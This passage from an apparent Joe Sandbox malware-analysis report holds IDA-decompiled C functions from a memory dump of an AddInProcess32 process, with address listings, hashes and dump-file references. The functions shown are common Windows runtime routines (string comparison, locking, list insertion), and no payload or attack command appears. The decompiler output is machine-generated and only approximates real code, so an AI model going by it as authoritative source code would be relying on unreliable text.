							_t116 = _t116 - 0x20;
						}
					}
					if(_t128 >= 0x61) {
						if(_t128 > 0x7a) {
							_t102 =  *0x1946d5c; // 0x7f170654
							_t84 =  *0x1946d5c; // 0x7f170654
							_t87 =  *0x1946d5c; // 0x7f170654
							_t128 =  *((intOrPtr*)(_t87 + (( *(_t84 + (( *(_t102 + (_t128 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t128 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t128 & 0x0000000f)) * 2)) + _t128 & 0x0000ffff;
						} else {
							_t128 = _t128 - 0x20;
						}
					}
					if(_t116 == _t128) {
						_t61 = _v12;
						_t96 = _v8;
					} else {
						_t113 = _t116 - _t128;
						L9:
						_t111 = _a4;
						if(_t113 == 0) {
							_t115 =  &(( *_t119)[_t111 + 1]);
							_t33 =  &(_t119[1]); // 0x100
							_t120 = _a8;
							_t95 =  *_t33 -  &(( *_t119)[_t111 + 1]) >> 1;
							_t35 = _t95 - 1; // 0xff
							_t124 = _t35;
							if(_t120 == 0) {
								L27:
								 *_a16 = _t95;
								_t56 = 0xc0000023;
								goto L16;
							}
							if(_t124 >= _a12) {
								if(_a12 >= 1) {
									 *_t120 = 0;
								}
								goto L27;
							}
							 *_a16 = _t124;
							_t125 = _t124 + _t124;
							E0189F3E0(_t120, _t115, _t125);
							_t56 = 0;
							 *((short*)(_t125 + _t120)) = 0;
							goto L16;
						}
						_t119 =  &(_t119[2]);
						if(_t119 < _v24) {
							L2:
							_t91 =  *_t119;
							_t61 = _t91;
							_v12 = _t61;
							_t112 =  &(_t61[_t111]);
							_v8 = _t112;
							if(_t61 >= _t112) {
								break;
							} else {
								_t127 = _v16 - _t91;
								_t96 = _t112;
								_v20 = _t127;
								_t116 =  *_t61 & 0x0000ffff;
								_t128 =  *(_t127 + _t61) & 0x0000ffff;
								if(_t116 == _t128) {
									goto L18;
								}
								goto L5;
							}
						} else {
							_t90 = _v28;
							_t57 = _v32;
							_t123 = _v36;
							goto L12;
						}
					}
					L18:
					_t61 =  &(_t61[1]);
					_v12 = _t61;
					if(_t61 >= _t96) {
						break;
					}
					_t127 = _v20;
				}
				_t113 = 0;
				goto L9;
			}

0x01882ae4
0x01882aec
0x01882aef
0x01882af4
0x01882af7
0x01882afd
0x01882b92
0x01882b92
0x01882b97
0x01882b9c
0x01882b9c
0x01882b03
0x01882b06
0x01882b09
0x01882b09
0x01882b0f
0x01882b15
0x01882b15
0x01882b1b
0x01882b1e
0x01882b21
0x01882b26
0x01882b29
0x01882b81
0x01882b84
0x01882c0e
0x01882c15
0x01882c24
0x01882c24
0x01882b8a
0x01882b8a
0x01882b8a
0x01882b8a
0x01882b90
0x00000000
0x00000000
0x00000000
0x00000000
0x01882b4a
0x01882b4a
0x01882b4d
0x01882b53
0x00000000
0x00000000
0x01882b55
0x01882b58
0x01882bb7
0x018c5d1b
0x018c5d37
0x018c5d47
0x018c5d53
0x01882bbd
0x01882bbd
0x01882bbd
0x01882bb7
0x01882b5d
0x01882c2f
0x018c5d5b
0x018c5d77
0x018c5d87
0x018c5d93
0x01882c35
0x01882c35
0x01882c35
0x01882c2f
0x01882b65
0x01882b9f
0x01882ba2
0x01882b67
0x01882b67
0x01882b69
0x01882b6b
0x01882b6e
0x01882bc9
0x01882bcc
0x01882bcf
0x01882bd4
0x01882bd6
0x01882bd6
0x01882bdb
0x01882c02
0x01882c05
0x01882c07
0x00000000
0x01882c07
0x01882be0
0x01882c00
0x01882c3f
0x01882c3f
0x00000000
0x01882c00
0x01882be5
0x01882be7
0x01882bec
0x01882bf4
0x01882bf6
0x00000000
0x01882bf6
0x01882b70
0x01882b76
0x01882b2b
0x01882b2b
0x01882b2d
0x01882b2f
0x01882b32
0x01882b35
0x01882b3a
0x00000000
0x01882b40
0x01882b43
0x01882b45
0x01882b47
0x01882b4a
0x01882b4d
0x01882b53
0x00000000
0x00000000
0x00000000
0x01882b53
0x01882b78
0x01882b78
0x01882b7b
0x01882b7e
0x00000000
0x01882b7e
0x01882b76
0x01882ba5
0x01882ba5
0x01882ba8
0x01882bad
0x00000000
0x00000000
0x01882baf
0x01882baf
0x01882bc2
0x00000000

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01d70d8f217c47927b7176275aca4124701d6d46a9d0559b29087073517f9d57
Instruction ID: d5a59b8744ce0d5c4f3a6b24ff68bb42360cd2416e8305a236291b35ce2aa291
Opcode Fuzzy Hash: 01d70d8f217c47927b7176275aca4124701d6d46a9d0559b29087073517f9d57
Instruction Fuzzy Hash: EB519EB6A01129CFCB18EF5CC8809BDB7F2FB88704719845AE846DB355E730AB51DB90

Uniqueness

Uniqueness Score: -1.00%

Function 0191AE44 Relevance: .2, Instructions: 152
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E0191AE44(signed char __ecx, signed int __edx, signed int _a4, signed char _a8, signed int* _a12) {
				signed int _v8;
				signed int _v12;
				void* __esi;
				void* __ebp;
				signed short* _t36;
				signed int _t41;
				char* _t42;
				intOrPtr _t43;
				signed int _t47;
				void* _t52;
				signed int _t57;
				intOrPtr _t61;
				signed char _t62;
				signed int _t72;
				signed char _t85;
				signed int _t88;

				_t73 = __edx;
				_push(__ecx);
				_t85 = __ecx;
				_v8 = __edx;
				_t61 =  *((intOrPtr*)(__ecx + 0x28));
				_t57 = _a4 |  *(__ecx + 0xc) & 0x11000001;
				if(_t61 != 0 && _t61 ==  *((intOrPtr*)( *[fs:0x18] + 0x24))) {
					_t57 = _t57 | 0x00000001;
				}
				_t88 = 0;
				_t36 = 0;
				_t96 = _a12;
				if(_a12 == 0) {
					_t62 = _a8;
					__eflags = _t62;
					if(__eflags == 0) {
						goto L12;
					}
					_t52 = E0191C38B(_t85, _t73, _t57, 0);
					_t62 = _a8;
					 *_t62 = _t52;
					_t36 = 0;
					goto L11;
				} else {
					_t36 = E0191ACFD(_t85, _t73, _t96, _t57, _a8);
					if(0 == 0 || 0 == 0xffffffff) {
						_t72 = _t88;
					} else {
						_t72 =  *0x00000000 & 0x0000ffff;
					}
					 *_a12 = _t72;
					_t62 = _a8;
					L11:
					_t73 = _v8;
					L12:
					if((_t57 & 0x01000000) != 0 ||  *((intOrPtr*)(_t85 + 0x20)) == _t88) {
						L19:
						if(( *(_t85 + 0xc) & 0x10000000) == 0) {
							L22:
							_t74 = _v8;
							__eflags = _v8;
							if(__eflags != 0) {
								L25:
								__eflags = _t88 - 2;
								if(_t88 != 2) {
									__eflags = _t85 + 0x44 + (_t88 << 6);
									_t88 = E0191FDE2(_t85 + 0x44 + (_t88 << 6), _t74, _t57);
									goto L34;
								}
								L26:
								_t59 = _v8;
								E0191EA55(_t85, _v8, _t57);
								asm("sbb esi, esi");
								_t88 =  ~_t88;
								_t41 = E01877D50();
								__eflags = _t41;
								if(_t41 == 0) {
									_t42 = 0x7ffe0380;
								} else {
									_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								}
								__eflags =  *_t42;
								if( *_t42 != 0) {
									_t43 =  *[fs:0x30];
									__eflags =  *(_t43 + 0x240) & 0x00000001;
									if(( *(_t43 + 0x240) & 0x00000001) != 0) {
										__eflags = _t88;
										if(_t88 != 0) {
											E01911608(_t85, _t59, 3);
										}
									}
								}
								goto L34;
							}
							_push(_t62);
							_t47 = E01921536(0x1948ae4, (_t74 -  *0x1948b04 >> 0x14) + (_t74 -  *0x1948b04 >> 0x14), _t88, __eflags);
							__eflags = _t47;
							if(_t47 == 0) {
								goto L26;
							}
							_t74 = _v12;
							_t27 = _t47 - 1; // -1
							_t88 = _t27;
							goto L25;
						}
						_t62 = _t85;
						if(L0191C323(_t62, _v8, _t57) != 0xffffffff) {
							goto L22;
						}
						_push(_t62);
						_push(_t88);
						E0191A80D(_t85, 9, _v8, _t88);
						goto L34;
					} else {
						_t101 = _t36;
						if(_t36 != 0) {
							L16:
							if(_t36 == 0xffffffff) {
								goto L19;
							}
							_t62 =  *((intOrPtr*)(_t36 + 2));
							if((_t62 & 0x0000000f) == 0) {
								goto L19;
							}
							_t62 = _t62 & 0xf;
							if(E018FCB1E(_t62, _t85, _v8, 3, _t36 + 8) < 0) {
								L34:
								return _t88;
							}
							goto L19;
						}
						_t62 = _t85;
						_t36 = E0191ACFD(_t62, _t73, _t101, _t57, _t62);
						if(_t36 == 0) {
							goto L19;
						}
						goto L16;
					}
				}
			}

0x0191ae44
0x0191ae4c
0x0191ae53
0x0191ae55
0x0191ae5c
0x0191ae64
0x0191ae68
0x0191ae75
0x0191ae75
0x0191ae78
0x0191ae7a
0x0191ae7c
0x0191ae7f
0x0191aea8
0x0191aeab
0x0191aead
0x00000000
0x00000000
0x0191aeb3
0x0191aeb8
0x0191aebb
0x0191aebd
0x00000000
0x0191ae81
0x0191ae88
0x0191ae8f
0x0191ae9b
0x0191ae96
0x0191ae96
0x0191ae96
0x0191aea0
0x0191aea3
0x0191aebf
0x0191aebf
0x0191aec3
0x0191aec9
0x0191af0d
0x0191af14
0x0191af3d
0x0191af3d
0x0191af41
0x0191af44
0x0191af67
0x0191af67
0x0191af6a
0x0191afca
0x0191afd1
0x00000000
0x0191afd1
0x0191af6c
0x0191af6d
0x0191af75
0x0191af7c
0x0191af7e
0x0191af80
0x0191af85
0x0191af87
0x0191af99
0x0191af89
0x0191af92
0x0191af92
0x0191af9e
0x0191afa1
0x0191afa3
0x0191afa9
0x0191afb0
0x0191afb2
0x0191afb4
0x0191afbc
0x0191afbc
0x0191afb4
0x0191afb0
0x00000000
0x0191afa1
0x0191af4f
0x0191af57
0x0191af5c
0x0191af5e
0x00000000
0x00000000
0x0191af60
0x0191af64
0x0191af64
0x00000000
0x0191af64
0x0191af1a
0x0191af25
0x00000000
0x00000000
0x0191af27
0x0191af28
0x0191af33
0x00000000
0x0191aed0
0x0191aed0
0x0191aed2
0x0191aee1
0x0191aee4
0x00000000
0x00000000
0x0191aee6
0x0191aeec
0x00000000
0x00000000
0x0191aefb
0x0191af07
0x0191afd3
0x0191afdb
0x0191afdb
0x00000000
0x0191af07
0x0191aed6
0x0191aed8
0x0191aedf
0x00000000
0x00000000
0x00000000
0x0191aedf
0x0191aec9

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e97bd4f156478950b5d862fc7a4fa810eb770df234a0a2bcbd3109b8cfad6b6
Instruction ID: 6abe1281a26a03237c532d60ee7841f8c112cedff034b95398c2eb89279861e5
Opcode Fuzzy Hash: 5e97bd4f156478950b5d862fc7a4fa810eb770df234a0a2bcbd3109b8cfad6b6
Instruction Fuzzy Hash: 8041D4B17022995BD726CA29C884F3FB79EEF84611F044619F91E873D8D734DD81C691

Uniqueness

Uniqueness Score: -1.00%

Function 0187DBE9 Relevance: .1, Instructions: 149
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E0187DBE9(intOrPtr __ecx, intOrPtr __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				signed int* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* __ebx;
				void* __edi;
				signed int _t54;
				char* _t58;
				signed int _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				intOrPtr _t72;
				intOrPtr _t73;
				signed int* _t75;
				intOrPtr _t79;
				intOrPtr _t80;
				char _t82;
				signed int _t83;
				signed int _t84;
				signed int _t88;
				signed int _t89;
				intOrPtr _t90;
				intOrPtr _t92;
				signed int _t97;
				intOrPtr _t98;
				intOrPtr* _t99;
				signed int* _t101;
				signed int* _t102;
				intOrPtr* _t103;
				intOrPtr _t105;
				signed int _t106;
				void* _t118;

				_t92 = __edx;
				_t75 = _a4;
				_t98 = __ecx;
				_v44 = __edx;
				_t106 = _t75[1];
				_v40 = __ecx;
				if(_t106 < 0 || _t106 <= 0 &&  *_t75 < 0) {
					_t82 = 0;
				} else {
					_t82 = 1;
				}
				_v5 = _t82;
				_t6 = _t98 + 0xc8; // 0xc9
				_t101 = _t6;
				 *((intOrPtr*)(_t98 + 0xd4)) = _a12;
				_v16 = _t92 + ((0 | _t82 != 0x00000000) - 0x00000001 & 0x00000048) + 8;
				 *((intOrPtr*)(_t98 + 0xd8)) = _a8;
				if(_t82 != 0) {
					 *(_t98 + 0xde) =  *(_t98 + 0xde) | 0x00000002;
					_t83 =  *_t75;
					_t54 = _t75[1];
					 *_t101 = _t83;
					_t84 = _t83 | _t54;
					_t101[1] = _t54;
					if(_t84 == 0) {
						_t101[1] = _t101[1] & _t84;
						 *_t101 = 1;
					}
					goto L19;
				} else {
					if(_t101 == 0) {
						E0185CC50(E01854510(0xc000000d));
						_t88 =  *_t101;
						_t97 = _t101[1];
						L15:
						_v12 = _t88;
						_t66 = _t88 -  *_t75;
						_t89 = _t97;
						asm("sbb ecx, [ebx+0x4]");
						_t118 = _t89 - _t97;
						if(_t118 <= 0 && (_t118 < 0 || _t66 < _v12)) {
							_t66 = _t66 | 0xffffffff;
							_t89 = 0x7fffffff;
						}
						 *_t101 = _t66;
						_t101[1] = _t89;
						L19:
						if(E01877D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t58 = 0x7ffe0386;
						}
						_t102 = _v16;
						if( *_t58 != 0) {
							_t58 = E01928ED6(_t102, _t98);
						}
						_t76 = _v44;
						E01872280(_t58, _v44);
						E0187DD82(_v44, _t102, _t98);
						E0187B944(_t102, _v5);
						return E0186FFB0(_t76, _t98, _t76);
					}
					_t99 = 0x7ffe03b0;
					do {
						_t103 = 0x7ffe0010;
						do {
							_t67 =  *0x1948628; // 0x0
							_v28 = _t67;
							_t68 =  *0x194862c; // 0x0
							_v32 = _t68;
							_v24 =  *((intOrPtr*)(_t99 + 4));
							_v20 =  *_t99;
							while(1) {
								_t97 =  *0x7ffe000c;
								_t90 =  *0x7FFE0008;
								if(_t97 ==  *_t103) {
									goto L10;
								}
								asm("pause");
							}
							L10:
							_t79 = _v24;
							_t99 = 0x7ffe03b0;
							_v12 =  *0x7ffe03b0;
							_t72 =  *0x7FFE03B4;
							_t103 = 0x7ffe0010;
							_v36 = _t72;
						} while (_v20 != _v12 || _t79 != _t72);
						_t73 =  *0x1948628; // 0x0
						_t105 = _v28;
						_t80 =  *0x194862c; // 0x0
					} while (_t105 != _t73 || _v32 != _t80);
					_t98 = _v40;
					asm("sbb edx, [ebp-0x20]");
					_t88 = _t90 - _v12 - _t105;
					_t75 = _a4;
					asm("sbb edx, eax");
					_t31 = _t98 + 0xc8; // 0x191fb53
					_t101 = _t31;
					 *_t101 = _t88;
					_t101[1] = _t97;
					goto L15;
				}
			}

0x0187dbe9
0x0187dbf2
0x0187dbf7
0x0187dbf9
0x0187dbfc
0x0187dc00
0x0187dc03
0x0187dc14
0x0187dd54
0x0187dd54
0x0187dd54
0x0187dc18
0x0187dc1d
0x0187dc1d
0x0187dc32
0x0187dc3b
0x0187dc3e
0x0187dc46
0x0187dd5b
0x0187dd62
0x0187dd64
0x0187dd67
0x0187dd69
0x0187dd6b
0x0187dd6e
0x0187dd70
0x0187dd73
0x0187dd73
0x00000000
0x0187dc4c
0x0187dc4e
0x018c3ae3
0x018c3ae8
0x018c3aea
0x0187dce7
0x0187dce9
0x0187dcec
0x0187dcee
0x0187dcf0
0x0187dcf3
0x0187dcf5
0x018c3af2
0x018c3af5
0x018c3af5
0x0187dd06
0x0187dd08
0x0187dd0b
0x0187dd12
0x018c3b08
0x0187dd18
0x0187dd18
0x0187dd18
0x0187dd20
0x0187dd23
0x018c3b16
0x018c3b16
0x0187dd29
0x0187dd2d
0x0187dd36
0x0187dd40
0x0187dd51
0x0187dd51
0x0187dc54
0x0187dc59
0x0187dc59
0x0187dc5e
0x0187dc5e
0x0187dc63
0x0187dc66
0x0187dc6b
0x0187dc78
0x0187dc7b
0x0187dc81
0x0187dc81
0x0187dc83
0x0187dc89
0x00000000
0x00000000
0x0187dd7b
0x0187dd7b
0x0187dc8f
0x0187dc8f
0x0187dc92
0x0187dc99
0x0187dc9f
0x0187dca5
0x0187dcaa
0x0187dcaa
0x0187dcb3
0x0187dcb8
0x0187dcbb
0x0187dcc1
0x0187dccf
0x0187dcd2
0x0187dcd5
0x0187dcd7
0x0187dcda
0x0187dcdc
0x0187dcdc
0x0187dce2
0x0187dce4
0x00000000
0x0187dce4

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29ab8d435f61ccb1982c609e64d472f68f8fb9090f502b6597868ef645707db7
Instruction ID: c08de5945096705bc84458c6e09c1397547815c6f8ca95c84f734eb8e470c59d
Opcode Fuzzy Hash: 29ab8d435f61ccb1982c609e64d472f68f8fb9090f502b6597868ef645707db7
Instruction Fuzzy Hash: 90519D75A01606CFCB14DFACC480AAEBBF5BF98310F24825AD955E7344EB31EA44CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0186EF40 Relevance: .1, Instructions: 147
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E0186EF40(intOrPtr __ecx) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t58;
				char _t59;
				signed char _t69;
				void* _t73;
				signed int _t74;
				char _t79;
				signed char _t81;
				signed int _t85;
				signed int _t87;
				intOrPtr _t90;
				signed char* _t91;
				void* _t92;
				signed int _t94;
				void* _t96;

				_t90 = __ecx;
				_v16 = __ecx;
				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
					_t58 =  *((intOrPtr*)(__ecx));
					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
						E01859080(_t73, __ecx, __ecx, _t92);
					}
				}
				_t74 = 0;
				_t96 =  *0x7ffe036a - 1;
				_v12 = 0;
				_v7 = 0;
				if(_t96 > 0) {
					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
					_v12 = _t74;
					_v7 = _t96 != 0;
				}
				_t79 = 0;
				_v8 = 0;
				_v5 = 0;
				while(1) {
					L4:
					_t59 = 1;
					L5:
					while(1) {
						if(_t59 == 0) {
							L12:
							_t21 = _t90 + 4; // 0x7788c21e
							_t87 =  *_t21;
							_v6 = 0;
							if(_t79 != 0) {
								if((_t87 & 0x00000002) != 0) {
									goto L19;
								}
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000003;
								} else {
									_t51 = _t87 - 2; // -2
									_t74 = _t51;
								}
								goto L15;
							} else {
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000001;
								} else {
									_t26 = _t87 - 4; // -4
									_t74 = _t26;
									if((_t74 & 0x00000002) == 0) {
										_t74 = _t74 - 2;
									}
								}
								L15:
								if(_t74 == _t87) {
									L19:
									E01852D8A(_t74, _t90, _t87, _t90);
									_t74 = _v12;
									_v8 = 1;
									if(_v7 != 0 && _t74 > 0x64) {
										_t74 = _t74 - 1;
										_v12 = _t74;
									}
									_t79 = _v5;
									goto L4;
								}
								asm("lock cmpxchg [esi], ecx");
								if(_t87 != _t87) {
									_t74 = _v12;
									_t59 = 0;
									_t79 = _v5;
									continue;
								}
								if(_v6 != 0) {
									_t74 = _v12;
									L25:
									if(_v7 != 0) {
										if(_t74 < 0x7d0) {
											if(_v8 == 0) {
												_t74 = _t74 + 1;
											}
										}
										_t38 = _t90 + 0x14; // 0x0
										_t39 = _t90 + 0x14; // 0x0
										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
											_t85 = _t85 & 0xff000000;
										}
										 *(_t90 + 0x14) = _t85;
									}
									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
									 *((intOrPtr*)(_t90 + 8)) = 1;
									return 0;
								}
								_v5 = 1;
								_t87 = _t74;
								goto L19;
							}
						}
						_t94 = _t74;
						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
						if(_t74 == 0) {
							goto L12;
						} else {
							_t91 = _t90 + 4;
							goto L8;
							L9:
							while((_t81 & 0x00000001) != 0) {
								_t69 = _t81;
								asm("lock cmpxchg [edi], edx");
								if(_t69 != _t81) {
									_t81 = _t69;
									continue;
								}
								_t90 = _v16;
								goto L25;
							}
							asm("pause");
							_t94 = _t94 - 1;
							if(_t94 != 0) {
								L8:
								_t81 =  *_t91;
								goto L9;
							} else {
								_t90 = _v16;
								_t79 = _v5;
								goto L12;
							}
						}
					}
				}
			}

0x0186ef4b
0x0186ef4d
0x0186ef57
0x0186f0bd
0x0186f0c2
0x0186f0d2
0x0186f0d2
0x0186f0c2
0x0186ef5d
0x0186ef5f
0x0186ef67
0x0186ef6a
0x0186ef6d
0x0186ef74
0x0186ef7f
0x0186ef82
0x0186ef82
0x0186ef86
0x0186ef88
0x0186ef8c
0x0186ef8f
0x0186ef8f
0x0186ef8f
0x00000000
0x0186ef91
0x0186ef93
0x0186efc4
0x0186efc4
0x0186efc4
0x0186efca
0x0186efd0
0x0186f0a6
0x00000000
0x00000000
0x0186f0af
0x018bbb06
0x018bbb0a
0x0186f0b5
0x0186f0b5
0x0186f0b5
0x0186f0b5
0x00000000
0x0186efd6
0x0186efd9
0x0186f0de
0x0186f0e2
0x0186efdf
0x0186efdf
0x0186efdf
0x0186efe5
0x018bbafc
0x018bbafc
0x0186efe5
0x0186efeb
0x0186efed
0x0186f00f
0x0186f011
0x0186f01a
0x0186f01d
0x0186f021
0x0186f028
0x0186f029
0x0186f029
0x0186f02c
0x00000000
0x0186f02c
0x0186eff3
0x0186eff9
0x0186f0ea
0x0186f0ed
0x0186f0ef
0x00000000
0x0186f0ef
0x0186f003
0x018bbb12
0x0186f045
0x0186f049
0x0186f051
0x0186f09e
0x0186f0a0
0x0186f0a0
0x0186f09e
0x0186f053
0x0186f064
0x0186f064
0x0186f06b
0x018bbb1a
0x018bbb1a
0x0186f071
0x0186f071
0x0186f07d
0x0186f082
0x0186f08f
0x0186f08f
0x0186f009
0x0186f00d
0x00000000
0x0186f00d
0x0186efd0
0x0186ef97
0x0186efa5
0x0186efaa
0x00000000
0x0186efac
0x0186efac
0x0186efac
0x00000000
0x0186efb2
0x0186f036
0x0186f03a
0x0186f040
0x0186f090
0x00000000
0x0186f092
0x0186f042
0x00000000
0x0186f042
0x0186efb7
0x0186efb9
0x0186efbc
0x0186efb0
0x0186efb0
0x00000000
0x0186efbe
0x0186efbe
0x0186efc1
0x00000000
0x0186efc1
0x0186efbc
0x0186efaa
0x0186ef91

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
Instruction ID: 43810c4f983c83b6c15ef4f2de83d72bee0b06ae362d9d4b07e5955249a23355
Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
Instruction Fuzzy Hash: 35510634E04249EFDB25CB6CD1D07EEBBB5AF05318F1481A8D645D7282C375AB89C742

Uniqueness

Uniqueness Score: -1.00%

Function 0192740D Relevance: .1, Instructions: 141
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E0192740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
				signed short* _v8;
				intOrPtr _v12;
				intOrPtr _t55;
				void* _t56;
				intOrPtr* _t66;
				intOrPtr* _t69;
				void* _t74;
				intOrPtr* _t78;
				intOrPtr* _t81;
				intOrPtr* _t82;
				intOrPtr _t83;
				signed short* _t84;
				intOrPtr _t85;
				signed int _t87;
				intOrPtr* _t90;
				intOrPtr* _t93;
				intOrPtr* _t94;
				void* _t98;

				_t84 = __edx;
				_t80 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t55 = __ecx;
				_v8 = __edx;
				_t87 =  *__edx & 0x0000ffff;
				_v12 = __ecx;
				_t3 = _t55 + 0x154; // 0x154
				_t93 = _t3;
				_t78 =  *_t93;
				_t4 = _t87 + 2; // 0x2
				_t56 = _t4;
				while(_t78 != _t93) {
					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
						L4:
						_t78 =  *_t78;
						continue;
					} else {
						_t7 = _t78 + 0x18; // 0x18
						if(E018AD4F0(_t7, _t84[2], _t87) == _t87) {
							_t40 = _t78 + 0xc; // 0xc
							_t94 = _t40;
							_t90 =  *_t94;
							while(_t90 != _t94) {
								_t41 = _t90 + 8; // 0x8
								_t74 = E0189F380(_a4, _t41, 0x10);
								_t98 = _t98 + 0xc;
								if(_t74 != 0) {
									_t90 =  *_t90;
									continue;
								}
								goto L12;
							}
							_t82 = L01874620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
							if(_t82 != 0) {
								_t46 = _t78 + 0xc; // 0xc
								_t69 = _t46;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t85 =  *_t69;
								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
									L20:
									_t82 = 3;
									asm("int 0x29");
								}
								 *((intOrPtr*)(_t82 + 4)) = _t69;
								 *_t82 = _t85;
								 *((intOrPtr*)(_t85 + 4)) = _t82;
								 *_t69 = _t82;
								 *(_t78 + 8) =  *(_t78 + 8) + 1;
								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
								goto L11;
							} else {
								L18:
								_push(0xe);
								_pop(0);
							}
						} else {
							_t84 = _v8;
							_t9 = _t87 + 2; // 0x2
							_t56 = _t9;
							goto L4;
						}
					}
					L12:
					return 0;
				}
				_t10 = _t87 + 0x1a; // 0x1a
				_t78 = L01874620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
				if(_t78 == 0) {
					goto L18;
				} else {
					_t12 = _t87 + 2; // 0x2
					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
					_t16 = _t78 + 0x18; // 0x18
					E0189F3E0(_t16, _v8[2], _t87);
					 *((short*)(_t78 + _t87 + 0x18)) = 0;
					_t19 = _t78 + 0xc; // 0xc
					_t66 = _t19;
					 *((intOrPtr*)(_t66 + 4)) = _t66;
					 *_t66 = _t66;
					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
					_t81 = L01874620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
					if(_t81 == 0) {
						goto L18;
					} else {
						_t26 = _t78 + 0xc; // 0xc
						_t69 = _t26;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t85 =  *_t69;
						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
							goto L20;
						} else {
							 *((intOrPtr*)(_t81 + 4)) = _t69;
							 *_t81 = _t85;
							 *((intOrPtr*)(_t85 + 4)) = _t81;
							 *_t69 = _t81;
							_t83 = _v12;
							 *(_t78 + 8) = 1;
							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							_t34 = _t83 + 0x154; // 0x1ba
							_t69 = _t34;
							_t85 =  *_t69;
							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
								goto L20;
							} else {
								 *_t78 = _t85;
								 *((intOrPtr*)(_t78 + 4)) = _t69;
								 *((intOrPtr*)(_t85 + 4)) = _t78;
								 *_t69 = _t78;
								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							}
						}
						goto L11;
					}
				}
				goto L12;
			}

0x0192740d
0x0192740d
0x01927412
0x01927413
0x01927416
0x01927418
0x0192741c
0x0192741f
0x01927422
0x01927422
0x01927428
0x0192742a
0x0192742a
0x01927451
0x01927432
0x0192744f
0x0192744f
0x00000000
0x01927434
0x01927438
0x01927443
0x01927517
0x01927517
0x0192751a
0x01927535
0x01927520
0x01927527
0x0192752c
0x01927531
0x01927533
0x00000000
0x01927533
0x00000000
0x01927531
0x0192754b
0x0192754f
0x0192755c
0x0192755c
0x0192755f
0x01927560
0x01927561
0x01927562
0x01927563
0x01927568
